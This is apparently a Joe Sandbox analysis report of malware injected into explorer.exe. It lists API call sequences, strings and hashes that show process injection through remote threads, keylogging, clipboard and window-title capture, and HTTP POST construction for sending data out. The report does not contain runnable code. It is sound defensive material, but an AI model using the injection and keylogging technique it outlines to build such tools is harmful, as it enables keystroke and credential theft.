                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryZeroconnecthtonsinet_addr
                            • String ID:
                            • API String ID: 3356813580-0
                            • Opcode ID: fae0a6f44bc21d975b6ffdcd3a32e858098b553fd02a229d9f5ec9166cffdbc5
                            • Instruction ID: 41b2c8c6db32aaf29ac9ac22d64c51ebc0ef37ef8a57a49c29f1d50207ef7932
                            • Opcode Fuzzy Hash: fae0a6f44bc21d975b6ffdcd3a32e858098b553fd02a229d9f5ec9166cffdbc5
                            • Instruction Fuzzy Hash: F7F054759022096BDB00AB94EC09DFF777CEF49710F000516E94592140D671499587B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:10.5%
                            Dynamic/Decrypted Code Coverage:97.5%
                            Signature Coverage:17.8%
                            Total number of Nodes:320
                            Total number of Limit Nodes:4

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,007D29F3,-00000001,007D128C), ref: 007D2731
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 007D1038
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D106C
                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 007D1075
                            • GetCurrentProcessId.KERNEL32(?,007D1010), ref: 007D107B
                            • wsprintfA.USER32 ref: 007D10E7
                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 007D1155
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D1160
                            • Process32First.KERNEL32(00000000,?), ref: 007D117F
                            • CharLowerA.USER32(?), ref: 007D1199
                            • lstrcmpi.KERNEL32(?,explorer.exe), ref: 007D11B5
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 007D1212
                            • Process32Next.KERNEL32(00000000,00000128), ref: 007D126C
                            • CloseHandle.KERNEL32(00000000), ref: 007D127F
                            • Sleep.KERNELBASE(000003E8), ref: 007D129F
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                            • API String ID: 3206029838-2805246637
                            • Opcode ID: 438b03e4875c3ac06689f1fb388fde71ab1b1fe340715c8cd14f417b5e9bcda3
                            • Instruction ID: edb80582f2ea69e14aa6a766921b0740a34d90f8b13d91b7d2a41c2b8239f04f
                            • Opcode Fuzzy Hash: 438b03e4875c3ac06689f1fb388fde71ab1b1fe340715c8cd14f417b5e9bcda3
                            • Instruction Fuzzy Hash: EB51F770205301AFC714EF70DC8997A77BAFB84710F44462BF956C73A2EA3D9E068666
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • wsprintfA.USER32 ref: 007D10E7
                              • Part of subcall function 007D276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 007D2777
                              • Part of subcall function 007D276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,007D10FE), ref: 007D2789
                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 007D1155
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D1160
                            • Process32First.KERNEL32(00000000,?), ref: 007D117F
                            • CharLowerA.USER32(?), ref: 007D1199
                            • lstrcmpi.KERNEL32(?,explorer.exe), ref: 007D11B5
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 007D1212
                            • Process32Next.KERNEL32(00000000,00000128), ref: 007D126C
                            • CloseHandle.KERNEL32(00000000), ref: 007D127F
                            • Sleep.KERNELBASE(000003E8), ref: 007D129F
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                            • API String ID: 3018447944-2805246637
                            • Opcode ID: 78f0640839d62fdb45c7dbb57a85540a292d2e9c706ee4c1ed357f07a8971275
                            • Instruction ID: b73469528b867166e7a8631578421eb2f22511b07a61e0cde16c54c9d7ad7718
                            • Opcode Fuzzy Hash: 78f0640839d62fdb45c7dbb57a85540a292d2e9c706ee4c1ed357f07a8971275
                            • Instruction Fuzzy Hash: C041F570304305ABC714AF709C8993A77BAFB94750F40462BF956933D2EB3DAE078662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Memory Dump Source
                            • Source File: 00000010.00000002.508073804.00000000007D8000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D8000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d8000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7cff28d127d2fdd3991eb3a0a7d2856ac7fd7c4b56aedf1412f9e298f0728f2f
                            • Instruction ID: f543fb4747cc00a3aeea2ed6c1b03a3d5163372cf6de0469e99b79e9671cd019
                            • Opcode Fuzzy Hash: 7cff28d127d2fdd3991eb3a0a7d2856ac7fd7c4b56aedf1412f9e298f0728f2f
                            • Instruction Fuzzy Hash: 2E5108B1A542525AD7219A78DCC07B4B7B4EB52324B29073BC6E6CB3C6E7AC5C06C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 177 7d276d-7d277f OpenFileMappingA 178 7d2794-7d2798 177->178 179 7d2781-7d2791 MapViewOfFile 177->179 179->178
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 007D2777
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,007D10FE), ref: 007D2789
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 038930d5547c06d2e21147c76b6ac4c446806eb6b27aa81053f876861971b8e5
                            • Instruction ID: 6f816b3d8ac26c866d7459f4cba27d805c5ea56e1991ab306a241d0eb36e4b25
                            • Opcode Fuzzy Hash: 038930d5547c06d2e21147c76b6ac4c446806eb6b27aa81053f876861971b8e5
                            • Instruction Fuzzy Hash: 40D01732702231BBE3345A7B6C0CF83AEAEDF86AF1B014026B50DD2150D6648811C2F4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 180 7d275a-7d276c UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,007D129A,00000001), ref: 007D275E
                            • FindCloseChangeNotification.KERNELBASE(?,?,007D129A,00000001), ref: 007D2765
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 8f1cbc42651c48377f296416c220217ecdfb62064f880dbc8625ce0ad173ae2d
                            • Instruction ID: dda913bcef55fb0b8ad300288c6484ec690c7a72db87406c7becc4cf5a56f82f
                            • Opcode Fuzzy Hash: 8f1cbc42651c48377f296416c220217ecdfb62064f880dbc8625ce0ad173ae2d
                            • Instruction Fuzzy Hash: 57B0123240703097C31427347C4C8DB3F39EE49221309C156F10D81010472C0A0186FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 181 7d2a09-7d2a19 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: ceb429befc759c4b1113c34830be285e6dbc9b0fe6acab7da7e2f7a0b765a4f6
                            • Instruction ID: 1970488dd6713d7f4676d2f1be1e3ddd3e10260572ca206a068ed033c8704f45
                            • Opcode Fuzzy Hash: ceb429befc759c4b1113c34830be285e6dbc9b0fe6acab7da7e2f7a0b765a4f6
                            • Instruction Fuzzy Hash: DDA012B06011006BDD0417A0AD0DF053739A740701F00C1017206C00508D7841048726
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,007D29F3,-00000001,007D128C), ref: 007D2731
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 007D18F4
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 007D192F
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 007D19BF
                            • RtlMoveMemory.NTDLL(00000000,007D3638,00000016), ref: 007D19E6
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 007D1A0E
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 007D1A1E
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007D1A38
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 007D1A40
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1A4E
                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1A55
                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007D1A6B
                            • GetProcAddress.KERNEL32(00000000), ref: 007D1A72
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1A88
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1AB2
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D1AC5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1ACC
                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1AD3
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1AE7
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007D1AFE
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B0B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B11
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B17
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007D1B1A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1066286714-2737717697
                            • Opcode ID: 79d6a5cd6a251d0a87153af4469ceb9fe536c81ec25709c9c95056b71851bd84
                            • Instruction ID: a2194cf92cf112078c88b58cc5a74e7d832e0a6f5383322f40c08d8edb31662e
                            • Opcode Fuzzy Hash: 79d6a5cd6a251d0a87153af4469ceb9fe536c81ec25709c9c95056b71851bd84
                            • Instruction Fuzzy Hash: 9561AD71205205BFD310DF209C88E6BBBFDEB89754F40851BF949D3291DA78DD048B66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 007D27B5
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 007D27CD
                            • lstrlen.KERNEL32(?,00000000), ref: 007D27D5
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 007D27E0
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 007D27FA
                            • wsprintfA.USER32 ref: 007D2811
                            • CryptDestroyHash.ADVAPI32(?), ref: 007D282A
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 007D2834
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: 5c8bc9d1193a65664655254c84273d2aafd3cb67921ab842da488113aea73bf2
                            • Instruction ID: 8c62b171cd60cebef7bf6e3bd3122f76a0a635a1be00fac5c171af270d56e278
                            • Opcode Fuzzy Hash: 5c8bc9d1193a65664655254c84273d2aafd3cb67921ab842da488113aea73bf2
                            • Instruction Fuzzy Hash: 20116D7190110CBFDB119B95EC88EEEBFBDEB48301F108066F604E2150D7394F019B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetKeyboardState.USER32(?), ref: 007D1652
                            • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 007D167A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: KeyboardStateUnicode
                            • String ID:
                            • API String ID: 3453085656-3916222277
                            • Opcode ID: 681fd436ec8e20ecda5fc4937b5a13feb1ae3f363e9e7445c732453f856abbb4
                            • Instruction ID: 375dcb513db66224f8e768702f7e4faf334f3de865193e20a56639d9d1c79341
                            • Opcode Fuzzy Hash: 681fd436ec8e20ecda5fc4937b5a13feb1ae3f363e9e7445c732453f856abbb4
                            • Instruction Fuzzy Hash: E7019632901619BBDB34CB54DE45BFB77BCAF45B00F88441BE901E2251DF38D9458AA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlZeroMemory.NTDLL(007D5013,0000001C), ref: 007D13C8
                            • VirtualQuery.KERNEL32(007D13AE,?,0000001C), ref: 007D13DA
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 007D140B
                            • GetCurrentProcessId.KERNEL32(00000004), ref: 007D141C
                            • wsprintfA.USER32 ref: 007D1433
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 007D1448
                            • GetLastError.KERNEL32 ref: 007D144E
                            • RtlInitializeCriticalSection.NTDLL(007D582C), ref: 007D1465
                            • Sleep.KERNEL32(000001F4), ref: 007D1489
                            • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 007D14A6
                            • GetProcAddress.KERNEL32(00000000), ref: 007D14AF
                            • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 007D14D0
                            • GetProcAddress.KERNEL32(00000000), ref: 007D14D3
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 007D14F1
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 007D150D
                            • CloseHandle.KERNEL32(00000000), ref: 007D1514
                            • RtlExitUserThread.NTDLL(00000000), ref: 007D152A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                            • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                            • API String ID: 3628807430-1779906909
                            • Opcode ID: e20f009623d8ba36e6806488efd04c05249e07a6c1ca89c954eac838954f72ac
                            • Instruction ID: 4ab0a911c13f1babb38a1196c6bc9c90e71ed6769da737b5905d5986cf54a7b1
                            • Opcode Fuzzy Hash: e20f009623d8ba36e6806488efd04c05249e07a6c1ca89c954eac838954f72ac
                            • Instruction Fuzzy Hash: BC41A0B0601304FBD710AB75EC1DE5A3BB9EB84751B40802BF90696391DB7D9A018BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlEnterCriticalSection.NTDLL(007D582C), ref: 007D16C4
                            • lstrlenW.KERNEL32 ref: 007D16DB
                            • lstrlenW.KERNEL32 ref: 007D16F3
                            • wsprintfW.USER32 ref: 007D1743
                            • GetForegroundWindow.USER32 ref: 007D174E
                            • GetWindowTextW.USER32(00000000,007D5850,00000800), ref: 007D1767
                            • GetClassNameW.USER32(00000000,007D5850,00000800), ref: 007D1774
                            • lstrcmpW.KERNEL32(007D5020,007D5850), ref: 007D1781
                            • lstrcpyW.KERNEL32(007D5020,007D5850), ref: 007D178D
                            • wsprintfW.USER32 ref: 007D17AD
                            • lstrcatW.KERNEL32 ref: 007D17C6
                            • RtlLeaveCriticalSection.NTDLL(007D582C), ref: 007D17D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                            • String ID: Clipboard -> $ New Window Caption -> $ P}$%s%s%s$%s%s%s%s$PX}
                            • API String ID: 2651329914-2303171855
                            • Opcode ID: 11d51ccbee293d27839d904d8878a94e59fa3ca853bc4bbd7039a48a4f442624
                            • Instruction ID: d7a5547d80182d5c240ba9a0beeefef79670568f8179783a9dd40ccd59ebb986
                            • Opcode Fuzzy Hash: 11d51ccbee293d27839d904d8878a94e59fa3ca853bc4bbd7039a48a4f442624
                            • Instruction Fuzzy Hash: 4A217134602619FBD3212B35FC89E2B3F79EB41B657448027F40192371DA2D9E01D6BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 007D2603
                            • GetCurrentThreadId.KERNEL32 ref: 007D260B
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 007D261B
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 007D2629
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 007D2648
                            • SuspendThread.KERNEL32(00000000), ref: 007D2658
                            • CloseHandle.KERNEL32(00000000), ref: 007D2667
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 007D2677
                            • CloseHandle.KERNEL32(00000000), ref: 007D2682
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: ff53ae0283614e0bfe026943573d870ae3076223c3cd0dc12133f6f8a17190c4
                            • Instruction ID: 58be803257f0e8a7711309f4d03fe2af4e4edced5360aeda8c1c8db3630abafc
                            • Opcode Fuzzy Hash: ff53ae0283614e0bfe026943573d870ae3076223c3cd0dc12133f6f8a17190c4
                            • Instruction Fuzzy Hash: E5113071406300EFD701AF60AD4CA6EBBB5EF95711F04846BFA4592650D738CA4A8BAB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                              • Part of subcall function 007D298A: lstrlen.KERNEL32(007D4FE2,?,00000000,00000000,007D20DD,772D81D0,007D4FE2,00000000), ref: 007D2992
                              • Part of subcall function 007D298A: MultiByteToWideChar.KERNEL32(00000000,00000000,007D4FE2,00000001,00000000,00000000), ref: 007D29A4
                              • Part of subcall function 007D24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 007D24DE
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 007D2139
                            • wsprintfW.USER32 ref: 007D2272
                            • wsprintfW.USER32 ref: 007D22DD
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007D23A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 14a160b8188279f7c7433862928164794a8b12d594bb980d30e741dbfd3f0bf7
                            • Instruction ID: cf0b7ff80486844150217632e224203ef1ddf33fc336300db518042828845c11
                            • Opcode Fuzzy Hash: 14a160b8188279f7c7433862928164794a8b12d594bb980d30e741dbfd3f0bf7
                            • Instruction Fuzzy Hash: 9EA17E71609345AFD3109F68D884A2BBBF8FF98740F14482EF985D3352DA39DD068B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlZeroMemory.NTDLL(?,00000018), ref: 007D24DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryZero
                            • String ID: }$O}$O}$O} }
                            • API String ID: 816449071-2910888726
                            • Opcode ID: ff308239831f2db645752f4cfb6d106c2c0b2b25080865b139d6909b991d4a6d
                            • Instruction ID: f21b25b43a37e5c6598b2122af5d5013f3bddae613a44cc62f9f6153c5f43908
                            • Opcode Fuzzy Hash: ff308239831f2db645752f4cfb6d106c2c0b2b25080865b139d6909b991d4a6d
                            • Instruction Fuzzy Hash: 811100B1A01209AFDB10DFA9E884EBEB7BDEB58701B10406AF945D3240D735DD05CB75
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlEnterCriticalSection.NTDLL(007D582C), ref: 007D1839
                            • lstrlenW.KERNEL32 ref: 007D1845
                            • RtlLeaveCriticalSection.NTDLL(007D582C), ref: 007D18A9
                            • Sleep.KERNEL32(00007530), ref: 007D18B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeaveSleeplstrlen
                            • String ID: ,X}
                            • API String ID: 2134730579-2462104651
                            • Opcode ID: b8f3d0327589d08482105c38e3ab20b21bc73060d32d9c4d488794a5d2ed1ade
                            • Instruction ID: fdc71ac79996955f0495916f09cccdce6b780fe24a349ca46132d45a9f00cb75
                            • Opcode Fuzzy Hash: b8f3d0327589d08482105c38e3ab20b21bc73060d32d9c4d488794a5d2ed1ade
                            • Instruction Fuzzy Hash: D1016770616500EBD714A775ED5D92E3BB9EB41710714802BF405D7362EA3C9D03A7B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,007D12D9,00000000,00000000,?,00000001), ref: 007D29C7
                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 007D12DC
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 007D138A
                              • Part of subcall function 007D2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,007D1119,00000001), ref: 007D2850
                              • Part of subcall function 007D2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,007D1119,00000001), ref: 007D2855
                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 007D1316
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D1332
                              • Part of subcall function 007D2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,007D136E), ref: 007D2591
                              • Part of subcall function 007D2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 007D259A
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D135F
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                            • String ID:
                            • API String ID: 2993730741-0
                            • Opcode ID: 65c39b0fc3b5a26d7166fe7ab80799310c3c0fa63b8b88d13c45dafedbf20469
                            • Instruction ID: 9c28d7f8061beb60fe93ce625b97f4ab4480d069beb168330fa920b6397c1522
                            • Opcode Fuzzy Hash: 65c39b0fc3b5a26d7166fe7ab80799310c3c0fa63b8b88d13c45dafedbf20469
                            • Instruction Fuzzy Hash: 7A217C70704202AF8304EF28985997EB7FAAB94710B50052FF856D3742DB3DED0A8B66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GlobalFix.KERNEL32(00000000), ref: 007D15A9
                            • lstrlenW.KERNEL32(00000000), ref: 007D15C6
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 007D15DC
                            • lstrlenW.KERNEL32(00000000), ref: 007D1600
                            • GlobalUnWire.KERNEL32(00000000), ref: 007D161C
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Globallstrlen$Wirelstrcat
                            • String ID:
                            • API String ID: 2993198917-0
                            • Opcode ID: 77afdcd5382a5974637ef43b522c038981940292fca810951e74bc6f864f108e
                            • Instruction ID: bd31e8e5657274c33b389d992fd9e1a8c09e924c3fdb2fa68c1735dabcaf4723
                            • Opcode Fuzzy Hash: 77afdcd5382a5974637ef43b522c038981940292fca810951e74bc6f864f108e
                            • Instruction Fuzzy Hash: 2901C032A05111BB962567797D985BE63BEDFD6711749803BF80BA3313DE2CCD034256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
